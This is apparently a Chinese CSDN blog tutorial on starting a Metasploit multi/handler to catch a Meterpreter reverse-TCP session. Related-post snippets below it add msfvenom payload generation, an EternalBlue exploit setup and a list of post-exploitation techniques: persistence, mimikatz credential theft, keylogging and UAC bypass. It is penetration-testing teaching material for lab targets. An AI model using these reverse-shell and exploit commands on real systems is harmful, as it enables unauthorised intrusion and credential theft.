msfconsole开启meterpreter

于 2024-02-20 06:43:25 发布
阅读量440 收藏 8
点赞数 8
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1_pha/article/details/136181507
版权

meterpreter是msf框架的一个后渗透工具,在靶机上运行了msfvenom使用相应payload生成的木马后,可通过meterpreter对其进行连接

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

其中lhost,lport为主机ip及端口

oneynhongx
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
async-meterpreter-controller:异步控制抄表器会话的模板
05-12
git clone https://github.com/DanMcInerney/async-meterpreter-controllercd async-meterpreter-controllerIn a new terminal: msfconsole -r msfrpc.rcpipenv install --threepipenv shellcd msfrpc && pyt
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4279
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
msf后渗透(Meterpreter命令)
最新发布
2302_76986722的博客
09-17 439
6 ,获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
Metasploit(三) Meterpreter基础知识
u010680986的博客
08-29 1632
攻击前期步骤: 1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息 3. 设置完毕后,输入exploit就可以进入meterpreter shell 基本命令 输入help可以查看所有Met.
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8408
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Kali 渗透测试:Meterpreter在Windows系统下的使用
Liu_Bruce的博客
05-11 3008
Kali 渗透测试:Meterpreter在Windows系统下的使用 实 验 环 境: VMware Workstation 16 PRO 操作机:Kali Linux 5.10.0 IP(192.168.68.125) 靶机:Win7 实 验 步 骤: 1. 生成被控端payload 在操作机执行如下命令: ┌──(root💀kali)-[~] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.68.125 L
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5617
meterpreter使用攻略(持续更新中)
metasploit常用渗透命令.zip
09-16
10. **自动化脚本**:使用`msfconsole`中的`-x`参数,可以运行自定义的Ruby脚本来自动化渗透测试流程。 理解并熟练运用这些命令是成为Metasploit专家的关键步骤。在实际使用中,应始终遵循合法授权和道德规范,仅...
永恒之蓝测试.docx
07-23
首先,启动 Metasploit 控制台:`msfconsole`。然后,使用 `search ms17-010` 命令来查找相关的漏洞模块。 漏洞利用 我们可以使用 Metasploit 的漏洞利用模块来攻击目标主机。首先,使用 `use` 命令来选择相应的...
IIS6.0最完整的利用,从远程利用,到本地提权,再到常见失败原因(CVE-2017-7269)1
08-04
重启msfconsole,加载新脚本,设置参数并执行,成功后可以获得meterpreter会话。 **二、本地提权步骤** 1. **提权策略**: 利用未打补丁的KB952004或其他可用的本地溢出工具提升权限。 2. **检查补丁状态**: ...
metasploit进阶
mingyqf的博客
02-28 855
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
后渗透之meterpreter使用攻略
xj28555的博客
08-10 2160
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚
Kali2虚拟机中工具Metasploit的简单应用
qq_55857040的博客
12-13 4331
实验环境 攻击机:Kali-Linux-2021.2-vmware-amd64 靶机:Win2003 旗舰版 实验过程 一、利用metasploit生成被控端 打开kali窗口,输入命令(注意空格符,复现过程惨痛代价) sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe 这样就是生成成功了 远程控制程序payload.exe(...
2、(权限提升)进入Meterpreter后的攻击方式小结
daxi0ng的博客
03-15 1557
##使用getsystem提权失败的话,可以使用WMIC工具进行提权准备,使用提权模块进行提权,如MS16-032,本次进入的就是system权限。 令牌窃取 令牌简介及原理 令牌 (Token) 就是系统的临时密钥, 相当于账户名和密码, 用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。 它允许你在不提供密码或其他凭证的前提下, 访问网络和系统资源。 这些令牌将持续存在于系统中, 除...
msf中收到了sessions却不反弹meterpreter的原因
Xionghuimin的博客
12-01 1118
msf中收到了sessions却不反弹meterpreter的原因 问题描述: 生成木马 ​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.189.130 lport=12346 -f exe >/hack.exe 监听并激活 use exploit/multi/handler‍‍ 进入监听模块exploit/multi/handler​是一个后门模块,配置一个反弹会话处理
msfconsole
08-21
msfconsoleMetasploit Framework 的命令行界面工具。它提供了一个交互式环境,可以用于执行渗透测试和漏利用任务。通过 msfconsole,你可以浏览可用的模块、设置扫描和攻击选项,以及执行各种渗透测试任务。你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值